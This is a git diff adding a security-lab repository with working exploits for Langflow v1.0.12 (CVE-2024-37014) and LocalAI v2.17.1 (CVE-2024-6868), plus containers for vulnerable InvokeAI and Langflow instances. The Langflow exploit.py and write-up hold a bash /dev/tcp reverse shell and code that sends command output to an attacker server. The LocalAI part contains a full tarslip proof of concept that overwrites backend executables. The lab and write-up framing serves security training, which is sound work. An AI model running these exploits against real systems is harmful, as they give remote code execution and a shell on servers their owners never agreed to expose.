diff --git a/exploitation/Langflow_v1.0.12/Makefile b/exploitation/Langflow_v1.0.12/Makefile new file mode 100644 index 0000000..f12d996 --- /dev/null +++ b/exploitation/Langflow_v1.0.12/Makefile @@ -0,0 +1,35 @@ +# exploitation/Langflow/Makefile +TARGET_URL ?= http://localhost:7860 +LISTENER_IP ?= $(shell ip route get 1.1.1.1 2>/dev/null | awk '{for(i=1;i<=NF;i++) if($$i=="src") print $$(i+1)}') +LISTENER_PORT ?= 1234 + +.PHONY: attack listen help + +help: + @echo "" + @echo " make listen - Start netcat listener on LISTENER_PORT" + @echo " make attack - Run the exploit (two-stage RCE)" + @echo " make attack LISTENER_IP= - Override attacker IP manually" + @echo "" + @echo " Detected LISTENER_IP : $(LISTENER_IP)" + @echo " TARGET_URL : $(TARGET_URL)" + @echo " LISTENER_PORT : $(LISTENER_PORT)" + @echo "" + +listen: + @echo "[*] Starting listener on port $(LISTENER_PORT) ..." + nc -lvnp $(LISTENER_PORT) + +attack: + @if [ -z "$(LISTENER_IP)" ]; then \ + echo "[-] Could not auto-detect LISTENER_IP."; \ + echo "[-] Run: make attack LISTENER_IP="; \ + exit 1; \ + fi + @echo "[*] LISTENER_IP = $(LISTENER_IP)" + @echo "[*] TARGET_URL = $(TARGET_URL)" + @echo "[*] Launching exploit ..." + python3 exploit.py \ + --url $(TARGET_URL) \ + --ip $(LISTENER_IP) \ + --port $(LISTENER_PORT) diff --git a/exploitation/Langflow_v1.0.12/README.md b/exploitation/Langflow_v1.0.12/README.md new file mode 100644 index 0000000..4dbf74a --- /dev/null +++ b/exploitation/Langflow_v1.0.12/README.md @@ -0,0 +1,245 @@ +# Writeup + +## **1. Introduction** + +This writeup details the penetration testing methodology used to discover and exploit a Remote Code Execution (RCE) vulnerability in Langflow’s Custom Component feature. The goal is to approach the pentest as an external attacker, moving from reconnaissance to full exploitation. + +--- + +## **2. Reconnaissance** + +### **2.1 Identifying the Target** + +We begin by scanning the target network to identify open ports and services using **Nmap**. This allows us to determine what services are running and if there are any potential attack vectors. + +```bash +nmap -sC -sV -A -p- +``` + +Output: + +![image.png](images/image.png) + +From the scan results, we observe that an **HTTP service is running on port 7860**, serving a web application via **Uvicorn**, a common ASGI server for Python applications. The HTTP response contains **"Langflow"** in the `` tag, strongly indicating that this service is running **Langflow**. + +### **2.2 Web Enumeration** + +Once we identify a web service, the next step is to gather more information about it. + +### **Checking the Langflow UI** + +We open the web application in our browser by navigating to `http://<LAB_IP>:7860`. The Langflow interface loads, confirming that the service is active. + +![image.png](images/image%201.png) + +The version doesn’t seem to be on the frontpage so we start a **new Blank Flow project** within Langflow. + +![image.png](images/image%202.png) + +While exploring the UI, we notice a **button on the bottom-left corner** that displays the version number when we hover over it. By doing this, we confirm that **Langflow v1.0.12** is in use. + +![image.png](images/image%203.png) + +--- + +## **3. Vulnerability Research** + +### **3.1 Checking for Known CVEs** + +Since we identified Langflow **1.0.12**, the next logical step is to check if there are any known vulnerabilities for this version. We manually check online sources such as: + +- [Exploit-DB](https://www.exploit-db.com/) +- [CVE Details](https://www.cvedetails.com/) +- [GitHub Security Advisories](https://github.com/advisories) + +During our research, we discover that the **Custom Component feature** allows arbitrary Python execution, making it a potential entry point for **Remote Code Execution (RCE)**. + +### **3.2 Vulnerability Overview: Remote Code Execution (RCE) via Custom Component Feature** + +Langflow’s **Custom Component** feature is designed to let users create and execute their own Python scripts within the framework. While this is a powerful tool for extending functionality, it introduces a critical security flaw when Langflow is hosted online. + +The issue lies in the **`POST /api/v1/custom_component`** endpoint, which processes user-supplied Python scripts without proper validation or sandboxing. This means an attacker can craft a malicious payload, send it to the server, and execute arbitrary Python code—effectively gaining full control over the system. + +Without restrictions on what code can be executed, this feature becomes a direct gateway to **Remote Code Execution (RCE)**. If exploited, an attacker could install backdoors, exfiltrate sensitive data, or pivot deeper into the network. This vulnerability, tracked as **CVE-2024-37014**, highlights the dangers of executing user-provided code in an unsanitized environment. + +<aside> +💡 + +**CVE-2024-37014** is a critical vulnerability affecting **Langflow versions up to (and including) 0.6.19** yet it seems to still affect **version 1.0.12** + +</aside> + +--- + +## **4. Exploitation** + +### **4.1 Exploiting the Custom Component Feature** + +Since the **Custom Component** feature allows users to upload custom Python scripts, we attempt to execute arbitrary system commands. + +### **Step 1: Create a New Project** + +Start by initializing a new project within the Langflow application. This will serve as the base for testing the vulnerability. + +Click on the New Project button: + +![image.png](images/image%204.png) + +Choose a Blank Flow: + +![image.png](images/image%205.png) + +Search for "Custom Components" in the menu on the left. + +Drag and drop a custom component onto the blank canvas: + +![image.png](images/image%206.png) + +Click on the code icon that appears on-top of the component to open the Edit Code window: + +![image.png](images/image%207.png) + +### **Step 2: Implement Malicious Python Function:** + +Within the `Component` class of the `CustomComponent`, include the following Python function. This function is designed to execute arbitrary system commands and send the output to our server: + +```python +import subprocess +import requests +import base64 + +def execute_and_send(): + result = subprocess.run(['uname', '-a'], capture_output=True, text=True) + if result.stderr: + print("Error:", result.stderr) + return + encoded_output = base64.b64encode(result.stdout.encode()).decode() + requests.get(f"http://<YOUR-SERVER>/?data={encoded_output}") + +execute_and_send() +``` + +This script uses Python's `subprocess` module to execute a system command (`uname -a`), which returns system information. It then Base64 encodes the output and sends it to a server via a `GET` request, where the data is sent as a query parameter. + +<aside> +💡 + +Be sure to include the payload into the component’s code not just replace it. + +</aside> + +This is an example of what the custom component code would look like with the payload injected: + +```python +# from langflow.field_typing import Data +from langflow.custom import Component +from langflow.io import MessageTextInput, Output +from langflow.schema import Data +import subprocess +import base64 + +class CustomComponent(Component): + display_name = "Custom Component" + description = "Use as a template to create your own component." + documentation: str = "http://docs.langflow.org/components/custom" + icon = "custom_components" + name = "CustomComponent" + + inputs = [ + MessageTextInput(name="input_value", display_name="Input Value", value="Hello, World!"), + ] + + outputs = [ + Output(display_name="Output", name="output", method="build_output"), + ] + + def build_output(self) -> Data: + data = Data(value=self.input_value) + self.status = data + return data + + def execute_and_send(): + # Execute arbitrary system command + result = subprocess.run(['uname', '-a'], capture_output=True, text=True) + if result.stderr: + print("Error:", result.stderr) + return + + # Base64 encode the output + encoded_output = base64.b64encode(result.stdout.encode()).decode() + + # Make a GET request with the base64 string as a query parameter + url = f"https://<YOUR-SERVER>?data={encoded_output}" + response = requests.get(url) + + execute_and_send() + +``` + +### **Step 3: Invoke Custom Component API:** + +After creating the custom component with the malicious code, click on the “Check & Save” button in the Langflow UI and run the component with the arrow on the top right of the component. This action triggers the `/api/v1/custom_component` API, which processes the provided Python script. + +![image.png](images/image%208.png) + +### **Step 4: Observe Arbitrary Command Execution:** + +Once the script is processed, the command (`uname -a`) will execute on the server. The output is captured, encoded in Base64, and sent to the specified malicious server via the `GET` request. + +### **Step 5: Establishing a Reverse Shell** + +To gain persistent access, we upgrade our exploit to create a **reverse shell**: + +```python +# from langflow.field_typing import Data +from langflow.custom import Component +from langflow.io import MessageTextInput, Output +from langflow.schema import Data +import subprocess + +class CustomComponent(Component): + display_name = "Custom Component" + description = "Use as a template to create your own component." + documentation: str = "http://docs.langflow.org/components/custom" + icon = "custom_components" + name = "CustomComponent" + + inputs = [ + MessageTextInput(name="input_value", display_name="Input Value", value="Hello, World!"), + ] + + outputs = [ + Output(display_name="Output", name="output", method="build_output"), + ] + + def build_output(self) -> Data: + # Store the reverse shell command in result + result = subprocess.run( + ["bash", "-c", "bash -i >& /dev/tcp/<YOUR-SERVER>/1234 0>&1"], + capture_output=True, + text=True + ) + + if result.stderr: + return Data(value=f"Error: {result.stderr}") + + return Data(value="Command executed") +``` + +We start a listener on our machine: + +```bash +nc -lvnp 1234 +``` + +We Check and Save our Custom Component code then press run. + +After executing the payload, we receive a shell on the target machine, confirming **Remote Code Execution.** + +![image.png](images/image%209.png) + +--- + +## **7. Conclusion** + +This penetration test demonstrates how an attacker can leverage the insecure execution of user-defined Python scripts within Langflow’s **Custom Component feature** to gain **Remote Code Execution (RCE)**. \ No newline at end of file diff --git a/exploitation/Langflow_v1.0.12/exploit.py b/exploitation/Langflow_v1.0.12/exploit.py new file mode 100644 index 0000000..9a0ff8a --- /dev/null +++ b/exploitation/Langflow_v1.0.12/exploit.py @@ -0,0 +1,216 @@ +import requests +import argparse +import json +import time + + +def run_exploit(target_url, listener_ip, listener_port): + print(f"[*] Targeting: {target_url}") + print(f"[*] Reverse shell -> {listener_ip}:{listener_port}") + + s = requests.Session() + s.headers.update({"Content-Type": "application/json"}) + + # ------------------------------------------------------------------ # + # The actual Langflow 1.0.x execution flow (mirrors the UI): # + # 1. POST /api/v1/flows/ -> create flow, get flow_id # + # 2. POST /api/v1/build/{id}/vertices -> get vertex list # + # 3. POST /api/v1/build/{id}/vertices/{vertex_id} -> EXECUTES code # + # ------------------------------------------------------------------ # + + malicious_code = f"""from langflow.custom import Component +from langflow.io import MessageTextInput, Output +from langflow.schema import Data +import subprocess + +class CustomComponent(Component): + display_name = "Custom Component" + description = "Use as a template to create your own component." + documentation: str = "http://docs.langflow.org/components/custom" + icon = "custom_components" + name = "CustomComponent" + + inputs = [ + MessageTextInput(name="input_value", display_name="Input Value", value="Hello, World!"), + ] + + outputs = [ + Output(display_name="Output", name="output", method="build_output"), + ] + + def build_output(self) -> Data: + subprocess.Popen( + ["bash", "-c", "bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1"], + close_fds=True, + start_new_session=True + ) + return Data(value="ok") +""" + + # ------------------------------------------------------------------ # + # STEP 1 — Validate code via custom_component (optional, mirrors UI) # + # ------------------------------------------------------------------ # + print("[*] Step 1 — validating component code ...") + try: + r = s.post(f"{target_url}/api/v1/custom_component", + data=json.dumps({"code": malicious_code}), timeout=10) + print(f" Status: {r.status_code}") + if r.status_code != 200: + print(f" Warning: {r.text[:200]}") + except Exception as e: + print(f" Warning: {e}") + + # ------------------------------------------------------------------ # + # STEP 2 — Create a flow containing the malicious component # + # ------------------------------------------------------------------ # + print("[*] Step 2 — creating flow ...") + + flow_payload = { + "name": "exploit", + "description": "", + "data": { + "nodes": [{ + "id": "pwn1", + "type": "genericNode", + "position": {"x": 100, "y": 100}, + "data": { + "id": "pwn1", + "type": "CustomComponent", + "node": { + "template": { + "_type": "Component", + "code": { + "type": "code", + "required": True, + "placeholder": "", + "list": False, + "show": True, + "multiline": True, + "value": malicious_code, + "password": False, + "name": "code", + "display_name": "Code", + "advanced": False, + "dynamic": False, + "info": "", + "fileTypes": [], + "file_path": "" + }, + "input_value": { + "type": "str", + "required": False, + "placeholder": "", + "list": False, + "show": True, + "multiline": False, + "value": "Hello, World!", + "password": False, + "name": "input_value", + "display_name": "Input Value", + "advanced": False, + "dynamic": False, + "info": "" + } + }, + "description": "Use as a template to create your own component.", + "display_name": "Custom Component", + "documentation": "http://docs.langflow.org/components/custom", + "base_classes": ["Data"], + "outputs": [{ + "name": "output", + "display_name": "Output", + "method": "build_output", + "selected": "Data", + "types": ["Data"] + }] + }, + "value": "CustomComponent" + } + }], + "edges": [], + "viewport": {"zoom": 1, "x": 0, "y": 0} + } + } + + flow_id = None + try: + r = s.post(f"{target_url}/api/v1/flows/", + data=json.dumps(flow_payload), timeout=10) + print(f" Status: {r.status_code}") + if r.status_code in (200, 201): + flow_id = r.json().get("id") + print(f" Flow ID: {flow_id}") + else: + print(f" Error: {r.text[:300]}") + return + except Exception as e: + print(f" Error: {e}") + return + + # ------------------------------------------------------------------ # + # STEP 3 — Get vertices (initialise the build graph) # + # ------------------------------------------------------------------ # + print("[*] Step 3 — initialising build graph ...") + vertex_id = None + try: + r = s.post(f"{target_url}/api/v1/build/{flow_id}/vertices", + data=json.dumps({}), timeout=10) + print(f" Status: {r.status_code}") + if r.status_code == 200: + data = r.json() + # Response contains ids of vertices to build in order + ids = data.get("ids", []) + print(f" Vertices to build: {ids}") + if ids: + vertex_id = ids[0] + else: + print(f" Error: {r.text[:300]}") + except Exception as e: + print(f" Error: {e}") + + if not vertex_id: + # fallback: use node id directly + vertex_id = "pwn1" + print(f" Falling back to vertex_id: {vertex_id}") + + # ------------------------------------------------------------------ # + # STEP 4 — Build the vertex → EXECUTES build_output() # + # ------------------------------------------------------------------ # + print(f"[*] Step 4 — building vertex {vertex_id} (triggers RCE) ...") + print("[*] Check your listener NOW ...") + try: + r = s.post( + f"{target_url}/api/v1/build/{flow_id}/vertices/{vertex_id}", + data=json.dumps({ + "inputs": {"input_value": "Hello, World!"}, + "data": {"node": {"template": {"input_value": {"value": "Hello, World!"}}}} + }), + timeout=15 + ) + print(f" Status: {r.status_code}") + if r.status_code == 200: + print("[+] Vertex built successfully — shell should be active!") + else: + print(f" Response: {r.text[:300]}") + except requests.exceptions.Timeout: + print("[+] Request timed out — shell likely active, check your listener!") + except Exception as e: + print(f" Error: {e}") + + # Cleanup + try: + s.delete(f"{target_url}/api/v1/flows/{flow_id}", timeout=5) + except Exception: + pass + + +if __name__ == "__main__": + parser = argparse.ArgumentParser( + description="CVE-2024-37014 — Langflow <=1.0.12 Unauthenticated RCE via Custom Component" + ) + parser.add_argument("--url", required=True, help="Langflow base URL e.g. http://localhost:7860") + parser.add_argument("--ip", required=True, help="Attacker IP for reverse shell callback") + parser.add_argument("--port", default="1234", help="Listener port (default: 1234)") + args = parser.parse_args() + + run_exploit(args.url, args.ip, args.port) diff --git a/exploitation/Langflow_v1.0.12/images/image 1.png b/exploitation/Langflow_v1.0.12/images/image 1.png new file mode 100644 index 0000000..0b56ba4 Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 1.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image 2.png b/exploitation/Langflow_v1.0.12/images/image 2.png new file mode 100644 index 0000000..7b20fe8 Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 2.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image 3.png b/exploitation/Langflow_v1.0.12/images/image 3.png new file mode 100644 index 0000000..d22eede Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 3.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image 4.png b/exploitation/Langflow_v1.0.12/images/image 4.png new file mode 100644 index 0000000..15a4931 Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 4.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image 5.png b/exploitation/Langflow_v1.0.12/images/image 5.png new file mode 100644 index 0000000..95efdd4 Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 5.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image 6.png b/exploitation/Langflow_v1.0.12/images/image 6.png new file mode 100644 index 0000000..45c39a8 Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 6.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image 7.png b/exploitation/Langflow_v1.0.12/images/image 7.png new file mode 100644 index 0000000..3686d5e Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 7.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image 8.png b/exploitation/Langflow_v1.0.12/images/image 8.png new file mode 100644 index 0000000..411c056 Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 8.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image 9.png b/exploitation/Langflow_v1.0.12/images/image 9.png new file mode 100644 index 0000000..3cd96f3 Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 9.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image.png b/exploitation/Langflow_v1.0.12/images/image.png new file mode 100644 index 0000000..7bb1d88 Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image.png differ diff --git a/exploitation/LocalAI_v2.17.1/README.md b/exploitation/LocalAI_v2.17.1/README.md new file mode 100644 index 0000000..de5f5c0 --- /dev/null +++ b/exploitation/LocalAI_v2.17.1/README.md @@ -0,0 +1,187 @@ +# LocalAI-CVE-2024-6868 + +In this writeup, we’ll go through the steps to obtain a reverse shell on LocalAI, the very famous OpenSource alternative to OpenAI. + +LocalAI is a selfhosted AI engine used to run models locally and generate text, audio, images and more. And we will be exploiting one of its feature that allows the user to upload other files the model can use. + +# Machine Walkthrough + +we start with enumerating the machine by a simple port scan. + +![image.png](images/image.png) + +![image.png](images/image%201.png) + +Http service on port 8080 + +Visit the website + +![image.png](images/image%202.png) + +First think that catches is the version of LocalAI that we see on the bottom of the page, v2.17.1. we do a quick search to find out if it has any public vulnerability/ + +![image.png](images/image%203.png) + +**CVE-2024-6868:** The LocalAI model’s configuration allows users to specify additional files that will be used by the model. If the user sends archives, they will be automatically extracted after their download. This allows to do "tarslip" and write files to arbitrary location bypassing any checks that otherwise keep everything in the models directory. + +So we can write any file we can on the server, but it has to not be existing. that’s itself is a vulnerability, however if we want to do code execution, we need to search for a file that the service executes and delete it then upload our payload instead. + +LocalAI process actually copies backend assets to the path /tmp/localai/backend_data/backend-assets. these copies are in general writable by the server and executed once we load a model. + +![image.png](images/image%204.png) + +Overwriting one of these files and running a model that uses a corresponding backend will then lead to an easy RCE. +I recommend reading this amazing report of Ozelis, the person behind this finding, on [https://huntr.com/bounties/f91fb287-412e-4c89-87df-9e4b6e609647](https://huntr.com/bounties/f91fb287-412e-4c89-87df-9e4b6e609647) . Save the poc he included in his report to a python script. + +### PoC + +This script will first delete the file on the server (if it exists) by exploiting another vulnerability. Then, it will create a model and download its files. Next, our payload will be placed in a tar file and uploaded to the server. The trick is that the tar archive contains a symlink to the target path where we want our payload to be located. The tar archive will then be automatically extracted on the server. + +```python +import json, time, tarfile + +from io import BytesIO +from random import randbytes, randint +from pathlib import Path +from argparse import ArgumentParser +from requests import Session + +from http.server import HTTPServer, BaseHTTPRequestHandler +from multiprocessing import Process, Queue + +# small template for models that will be served to localai: +model_tmpl = """ +name: {} +files: + - filename: {} + uri: {} +""" + +g_queue = Queue() # used for some janky ipc with http server + +class HttpHandler(BaseHTTPRequestHandler): + def log_message(self, format, *args): + pass + + def do_GET(self): + self.send_response(200) + self.send_header('content-type', 'application/text') + self.end_headers() + rsp = g_queue.get() + print(f"response to {self.path}:", rsp[:64], "...") + self.wfile.write(rsp) + +def run_httpd(lhost, lport): + print(f"running httpserver on {lhost}:{lport}") + httpd = HTTPServer((lhost, lport), HttpHandler) + httpd.serve_forever() + +if __name__ == "__main__": + parser = ArgumentParser() + parser.add_argument("--lhost", default="localhost") + parser.add_argument("--url", default="http://localhost:8080") + parser.add_argument("--local_path", default="poc.txt") + parser.add_argument("--remote_path", default="/tmp/poc.txt") + args = parser.parse_args() + + remote_path = Path(args.remote_path) + + # --lhost is attackers host as seen from the localai, so if localai + # runs in docker use 172.17.0.1 (or something like that depending on + # your system), if running locally just use localhost: + lport = randint(50000, 60000) + attacker_url = f"http://{args.lhost}:{lport}" + + # run http service that will serve the files: + proc = Process(target=run_httpd, args=(args.lhost, lport)) + proc.start() + time.sleep(1) + + with Session() as s: + # use another vulnerability to delete the target first, because our "arbitrary" + # write can not overwrite files, just write a new file: + m_name = "m_" + randbytes(4).hex() + g_queue.put(f"name: {m_name}\n".encode()) + rsp = s.post(f"{args.url}/models/apply", json={ + "url" : f"http://{args.lhost}:{lport}/{m_name}.yaml", + "overrides" : { + "mmproj" : f"../../../../../../../../../../{args.remote_path}", + } + }) + rsp = s.post(f"{args.url}/models/delete/{m_name}") + + # create a model from a config and let it download the files. If the file is an archive + # it will automatically uncompress the contents: + m_name = "m_" + randbytes(4).hex() + model_yaml = model_tmpl.format(m_name, f"{m_name}.tar", f"{attacker_url}/{m_name}.tar") + + g_queue.put(model_yaml.encode()) + rsp = s.post(f"{args.url}/models/apply", json={ + "url" : f"http://{args.lhost}:{lport}/{m_name}.yaml", + }) + + # create a tar file with a symlink pointing to the directory of `remote_path`. + redirect = randbytes(4).hex() + fake_tar = BytesIO() + with tarfile.open(fileobj=fake_tar, mode="w") as tar: + info = tarfile.TarInfo(redirect) + info.type = tarfile.SYMTYPE + info.linkname = str(remote_path.parent) + tar.addfile(info) + + g_queue.put(fake_tar.getvalue()) + + # do another tarslip, but this time save the .tar file to symlink'ed directory + # so that the contents of this new tar are extracted there. this will allow to + # write a file with the same attributes as `args.local_path` + m_name = "m_" + randbytes(4).hex() + model_yaml = model_tmpl.format(m_name, f"{redirect}/{redirect}.tar", f"{attacker_url}/{m_name}.tar") + g_queue.put(model_yaml.encode()) + + rsp = s.post(f"{args.url}/models/apply", json={ + "url" : f"http://{args.lhost}:{lport}/{m_name}.yaml", + }) + + fake_tar = BytesIO() + with tarfile.open(fileobj=fake_tar, mode="w") as tar: + tar.add(args.local_path, arcname=str(remote_path.name)) + + g_queue.put(fake_tar.getvalue()) + + time.sleep(1) + input("press enter to continue...") + + proc.kill() +``` + +Now, we rests to do is create our payload and run the poc, then request the then malicious model. + +1. create a reverse shell payload: + +![image.png](images/image%205.png) + +Make sure the payload is in an executable file (chmod +x pwn) + +1. overwrite one of the backened assetes (whisper for example) + +![image.png](images/image%206.png) + +1. download a sample .ogg file (it s needed for the model to work ) + +![image.png](images/image%207.png) + +1. Upload the model file and inject our malicious backend file + +![image.png](images/image%208.png) + +1. start a listener on your attacker machine + +![image.png](images/image%209.png) + +1. Load whisper model + +![image.png](images/image%2010.png) + +pwned :> + +![image.png](images/image%2011.png) \ No newline at end of file diff --git a/exploitation/LocalAI_v2.17.1/images/image 1.png b/exploitation/LocalAI_v2.17.1/images/image 1.png new file mode 100644 index 0000000..a2f5769 Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 1.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 10.png b/exploitation/LocalAI_v2.17.1/images/image 10.png new file mode 100644 index 0000000..c29f718 Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 10.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 11.png b/exploitation/LocalAI_v2.17.1/images/image 11.png new file mode 100644 index 0000000..55ed5ff Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 11.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 2.png b/exploitation/LocalAI_v2.17.1/images/image 2.png new file mode 100644 index 0000000..a45a15b Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 2.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 3.png b/exploitation/LocalAI_v2.17.1/images/image 3.png new file mode 100644 index 0000000..4cabd52 Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 3.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 4.png b/exploitation/LocalAI_v2.17.1/images/image 4.png new file mode 100644 index 0000000..210bde9 Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 4.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 5.png b/exploitation/LocalAI_v2.17.1/images/image 5.png new file mode 100644 index 0000000..2bec74b Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 5.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 6.png b/exploitation/LocalAI_v2.17.1/images/image 6.png new file mode 100644 index 0000000..81349fc Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 6.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 7.png b/exploitation/LocalAI_v2.17.1/images/image 7.png new file mode 100644 index 0000000..bd16b6f Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 7.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 8.png b/exploitation/LocalAI_v2.17.1/images/image 8.png new file mode 100644 index 0000000..ad72673 Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 8.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 9.png b/exploitation/LocalAI_v2.17.1/images/image 9.png new file mode 100644 index 0000000..22868fa Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 9.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image.png b/exploitation/LocalAI_v2.17.1/images/image.png new file mode 100644 index 0000000..f8d2481 Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image.png differ diff --git a/sandboxes/llm_local_InvokeAI_v5.3.0/Containerfile b/sandboxes/llm_local_InvokeAI_v5.3.0/Containerfile new file mode 100644 index 0000000..d1956b1 --- /dev/null +++ b/sandboxes/llm_local_InvokeAI_v5.3.0/Containerfile @@ -0,0 +1,43 @@ +FROM python:3.11-slim + +# Install system dependencies +RUN apt-get update && apt-get install -y \ + git \ + curl \ + libgl1 \ + libglib2.0-0 \ + libsm6 \ + libxext6 \ + libxrender-dev \ + && rm -rf /var/lib/apt/lists/* + +# Install InvokeAI 5.3.0 (CPU-only, no GPU required for lab) +RUN pip install --no-cache-dir \ + "invokeai==5.3.0" \ + --extra-index-url https://download.pytorch.org/whl/cpu + +# Pin mediapipe to exactly 0.10.7 (minimum required by InvokeAI 5.3.0). +# Newer mediapipe versions (e.g. 0.10.32) dropped the `solutions` API that +# controlnet-aux 0.0.7 needs (mp.solutions.drawing_utils -> AttributeError). +# 0.10.7 still ships the solutions submodule intact. +RUN pip install --no-cache-dir --force-reinstall "mediapipe==0.10.7" + +# Re-pin numpy to 1.26.4 as required by InvokeAI 5.3.0. +# mediapipe and other deps can silently pull in numpy 2.x, which causes a +# binary ABI mismatch with scikit-image's compiled C extensions: +# "numpy.dtype size changed, may indicate binary incompatibility" +RUN pip install --no-cache-dir --force-reinstall "numpy==1.26.4" + +# Pin picklescan to the vulnerable version (0.0.14). +# This version fails to detect malicious pickle payloads inside .ckpt files, +# which is the root cause of CVE-2024-12029. +RUN pip install --no-cache-dir --force-reinstall "picklescan==0.0.14" + +EXPOSE 9090 + +# InvokeAI 5.x does not accept --host/--port as CLI flags. +# Host and port are configured via environment variables. +ENV INVOKEAI_host=0.0.0.0 +ENV INVOKEAI_port=9090 + +CMD ["invokeai-web"] diff --git a/sandboxes/llm_local_InvokeAI_v5.3.0/Makefile b/sandboxes/llm_local_InvokeAI_v5.3.0/Makefile new file mode 100644 index 0000000..09b749f --- /dev/null +++ b/sandboxes/llm_local_InvokeAI_v5.3.0/Makefile @@ -0,0 +1,55 @@ +IMAGE_NAME := invokeai +CONTAINER_NAME := invokeai +PORT := 9090 +NETWORK := podman + +.PHONY: all build run stop clean ip + +all: build run + +build: + podman build -f Containerfile -t $(IMAGE_NAME) . + +run: + podman run -d \ + --name $(CONTAINER_NAME) \ + --network host \ + -p $(PORT):$(PORT) \ + $(IMAGE_NAME) + @echo "" + @echo " [+] InvokeAI v5.3.0 running at http://localhost:$(PORT)" + @echo " [+] CVE-2024-12029 (RCE via model deserialization) is exploitable." + @echo " [+] Container IP (use this for --ip when attacking):" + @podman inspect $(CONTAINER_NAME) \ + --format '{{range .NetworkSettings.Networks}} [+] Container IP : {{.IPAddress}}{{end}}' + @echo "" + +ip: + @podman inspect $(CONTAINER_NAME) \ + --format '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' + +stop: + podman stop $(CONTAINER_NAME) 2>/dev/null || true + podman rm $(CONTAINER_NAME) 2>/dev/null || true + +clean: stop + podman rmi $(IMAGE_NAME) 2>/dev/null || true + +format: + @echo "[*] Running black formatter..." + @if command -v uv >/dev/null 2>&1; then \ + uv run black $(shell find . -name "*.py") 2>/dev/null && echo " [+] black done" || echo " [-] black failed or no .py files found"; \ + elif command -v black >/dev/null 2>&1; then \ + black $(shell find . -name "*.py") 2>/dev/null && echo " [+] black done" || echo " [-] black failed or no .py files found"; \ + else \ + echo " [-] black not found. Install with: pip install black"; \ + fi + @echo "[*] Running isort import sorter..." + @if command -v uv >/dev/null 2>&1; then \ + uv run isort $(shell find . -name "*.py") 2>/dev/null && echo " [+] isort done" || echo " [-] isort failed or no .py files found"; \ + elif command -v isort >/dev/null 2>&1; then \ + isort $(shell find . -name "*.py") 2>/dev/null && echo " [+] isort done" || echo " [-] isort failed or no .py files found"; \ + else \ + echo " [-] isort not found. Install with: pip install isort"; \ + fi + @echo "[+] Formatting complete!" diff --git a/sandboxes/llm_local_InvokeAI_v5.3.0/README.md b/sandboxes/llm_local_InvokeAI_v5.3.0/README.md new file mode 100644 index 0000000..c73a37b --- /dev/null +++ b/sandboxes/llm_local_InvokeAI_v5.3.0/README.md @@ -0,0 +1,84 @@ +# InvokeAI Sandbox + +This sandbox environment deploys a vulnerable instance of InvokeAI (v5.3.0). It is designed for security researchers to practice exploitation techniques against GenAI image generation platforms, specifically focusing on unauthenticated Remote Code Execution (RCE) via model deserialization. + +--- + + +## Prerequisites + +- Podman (preferred) or Docker +- Make utility + +> **Note:** Ensure port `9090` is not being used by another local service before starting the sandbox. + +--- + +## Setup and Lifecycle + +This lab uses a `Makefile` to simplify container management using Podman. + +### 1. Build and Start the Sandbox + +This will build the image and start the container in detached mode. + +```bash +make all +``` + +### 2. Verify the Environment + +Check if the service is running: + +```bash +podman ps +``` + +The InvokeAI UI should be accessible at: + +``` +http://localhost:9090 +``` + +--- + +### 3. Running an Attack + +To trigger the automated attack, navigate to the `exploitation/InvokeAI_v5.3.0` directory. First start a listener: + +```bash +make listen +``` + +Then in a second terminal, serve the payload: + +```bash +make serve +``` + +Then in a third terminal, trigger the exploit: + +```bash +make attack +``` + +--- + +### 4. Stop and Cleanup + +To stop the container and remove the image: + +```bash +make clean +``` + +--- + +## Directory Structure + +``` +sandboxes/InvokeAI_v5.3.0/ +├── Containerfile # Podman definition for the vulnerable environment +├── Makefile # Automation for build/run/stop/clean +└── README.md # Documentation +``` diff --git a/sandboxes/llm_local_langflow_v1.0.12/Containerfile b/sandboxes/llm_local_langflow_v1.0.12/Containerfile new file mode 100644 index 0000000..f7d7d54 --- /dev/null +++ b/sandboxes/llm_local_langflow_v1.0.12/Containerfile @@ -0,0 +1,5 @@ +FROM docker.io/langflowai/langflow:1.0.12 + +EXPOSE 7860 + +CMD ["langflow", "run", "--host", "0.0.0.0", "--port", "7860"] diff --git 